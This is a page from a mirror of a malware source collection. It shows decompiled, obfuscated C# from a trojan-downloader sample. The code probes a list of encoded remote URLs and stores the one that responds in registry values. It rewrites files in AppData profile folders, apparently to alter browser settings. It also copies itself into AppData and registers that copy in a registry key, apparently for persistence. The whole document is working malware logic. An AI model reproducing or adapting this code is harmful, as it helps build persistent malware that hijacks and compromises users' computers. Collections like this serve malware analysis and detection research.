ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-19 16:48:52 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0004/_0001.cs

117 lines
4.3 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0003;
using \u0004;
using \u0005;
using Microsoft.Win32;
using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0004
{
internal sealed class \u0001
{
private static bool \u0001 = true;
private static string[] \u0002 = new string[5]
{
\u0001.\u0001(860),
\u0001.\u0001(941),
\u0001.\u0001(1010),
\u0001.\u0001(1087),
\u0001.\u0001(1172)
};
private static string \u0003 = \u0001.\u0001(1249);
internal static bool \u0004 = false;
private static bool \u0005 = false;
private static void \u0001([In] string[] obj0)
{
\u0001.\u0001();
if (\u0001.\u0001)
;
if (false)
return;
\u0001.\u0001(2);
\u0001.\u0001(\u0001.\u0001(54));
string str1 = \u0001.\u0001(95);
\u0001.\u0001(\u0001.\u0001(96));
for (int index = 0; index < \u0001.\u0002.Length; ++index)
{
\u0001.\u0001(\u0001.\u0001(141) + \u0001.\u0002[index]);
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(new Uri(\u0001.\u0002[index]));
try
{
HttpWebResponse response = (HttpWebResponse) httpWebRequest.GetResponse();
if (response == null || response.StatusCode != HttpStatusCode.OK)
{
\u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(154));
}
else
{
\u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(199));
str1 = \u0001.\u0002[index];
break;
}
}
catch (Exception ex)
{
\u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(212));
}
}
\u0001.\u0001(20);
\u0001.\u0001(\u0001.\u0001(257));
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(\u0001.\u0001(330), true);
registryKey.SetValue(\u0001.\u0001(411), (object) 1, RegistryValueKind.DWord);
registryKey.SetValue(\u0001.\u0001(428), (object) 1, RegistryValueKind.DWord);
registryKey.SetValue(\u0001.\u0001(449), (object) str1, RegistryValueKind.String);
registryKey.Close();
\u0001.\u0001(\u0001.\u0001(470));
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0001.\u0001(503);
\u0001.\u0001(\u0001.\u0001(540) + path);
string searchPattern = \u0001.\u0001(561);
\u0001.\u0001(10);
foreach (string directory in Directory.GetDirectories(path, searchPattern))
{
\u0001.\u0001(\u0001.\u0001(574) + directory);
if (System.IO.File.Exists(directory + \u0001.\u0001(607)))
{
\u0001.\u0001(\u0001.\u0001(620));
\u0001.\u0001(\u0001.\u0001(641));
StringBuilder stringBuilder = new StringBuilder();
foreach (string readAllLine in System.IO.File.ReadAllLines(directory + \u0001.\u0001(607)))
{
for (int index = 0; index < 5; ++index)
{
if (readAllLine.Contains(\u0001.\u0001(654) + index.ToString() + \u0001.\u0001(699)))
readAllLine.Replace(\u0001.\u0001(654) + index.ToString() + \u0001.\u0001(699), \u0001.\u0001(704));
}
stringBuilder.AppendLine(readAllLine);
}
stringBuilder.AppendLine(\u0001.\u0001(704));
System.IO.File.WriteAllText(directory + \u0001.\u0001(607), stringBuilder.ToString());
}
}
if (\u0001.\u0005)
{
string str2 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0001.\u0001(753);
if (!System.IO.File.Exists(str2))
{
Registry.CurrentUser.OpenSubKey(\u0001.\u0001(778), true).SetValue(\u0001.\u0001(839), (object) str2);
System.IO.File.Copy(Assembly.GetExecutingAssembly().Location, str2);
\u0001.\u0001(\u0001.\u0003);
}
}
else
\u0001.\u0001(\u0001.\u0003);
}
}
}
Reference in New Issue Copy Permalink